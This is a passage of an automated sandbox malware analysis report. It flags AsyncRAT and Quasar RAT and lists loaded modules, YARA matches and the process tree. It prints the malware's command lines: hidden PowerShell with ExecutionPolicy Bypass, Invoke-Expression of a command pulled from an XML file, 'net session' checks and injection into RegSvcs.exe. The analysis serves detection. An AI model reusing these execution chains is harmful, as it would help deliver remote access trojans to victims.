              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Matched Yara rules and their metadata:
              MALWARE_Win_AsyncRAT: author = ditekSHen, description = Detects AsyncRAT
              Windows_Trojan_Asyncrat_11a11ba1: reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse: author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Quasar_RAT_1: date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Yara matches:
              Source: dump.pcap, type: PCAP | Matched rule: MALWARE_Win_AsyncRAT
              Source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
              Source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
              Source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
              Source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
              Source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1
              Source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1
              Source: 00000016.00000002.4626854201.0000000005247000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000016.00000002.4523483443.0000000001029000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
              Source: 00000016.00000002.4646402691.00000000066FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000016.00000002.4523483443.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Quasar_RAT_1
              Source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Quasar_RAT_1
              Source: 00000016.00000002.4647656889.000000000673B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000016.00000002.4626854201.0000000005230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000016.00000002.4646275028.00000000066F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000027.00000002.4004352545.000000000300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1
              Source: 0000001F.00000002.2797263415.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000016.00000002.4628005703.0000000005250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000027.00000002.3995210664.0000000001249000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1
              Source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1
              Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
              Source: 00000016.00000002.4536701610.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
              Source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1
              Source: 0000001F.00000002.2808356805.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT
              Source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT
              Source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR | Matched rules: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, MALWARE_Win_AsyncRAT
              Source: Process Memory Space: RegSvcs.exe PID: 3728, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor' (3 occurrences)
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor' (3 occurrences)
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor' (3 occurrences)
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor' (3 occurrences)
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, 30.2.powershell.exe.2d900422b00.0.raw.unpack and 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, vrBADUWmYjhCttZTy.cs | Base64 encoded strings (identical in all three unpacks): 'gqxh4ygzYVIfO8hr4z6DQxmk45Jyd9bbNdNP3RRNKVDRDyPwUq5GAuTLmP5VrMW43PRnF+pcVzHMvZ29ZarrLw==', 'uYXq4px9A6sxN3ugkJp0Kku1W54SRS6gB652/mjNkQaprEY6GTGZc2bm0rVVQA/Id67ATXEj78j4HHi3Wc85IFw5wx6r7s+BMIxilBuSoNE=', 'yjL+aPJSqRqDUPYon91fKcDeaOB3joEzpPydelmnVSlpNvx3qyKFDehtNJ/oqIO2kUDAU25+vjJfdo1BEnQB2A==', 'kfrpCzzzFN1EnymxkxKR2Tocsii201fIPBgXgmNfMbA5ipsVOKt234KWwgPjiq4y9XnzsOgQT+4huhP7OX+UFg==', 'g2aa8LSaYxpJrQYbTytLNPeKoequv42EMoy/iv86uDr58uLdquncXUvdhJNGb0cBGn6zl7pTyUWuO7UNCtEs5g==', 'Zzn8gAtxSQt3oqkpPzwovnLpyIlECDHyIqjhiQm2jIH9kaNw0UnhLtqS5DVj6Sn8Sm5SwR1y8JDCQG3rz17pfw==', 'nxfAaU84Ph48cNiebgKY8yQwpOM0qgylEjB+txIxPCffDE6ZJU7xc2sIAghinxOdFfhUdol+Se5HZlcmk/0tuQ=='
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winWSF@60/30@1/3
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\sExygfKkJDoIUpeo[1].txtJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3928:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_dHCTyo6u65FEkSZ3
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqo1c1k2.bm4.ps1Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs"
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $commandJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" sessionJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "Jump to behavior
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" sessionJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "Jump to behavior
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
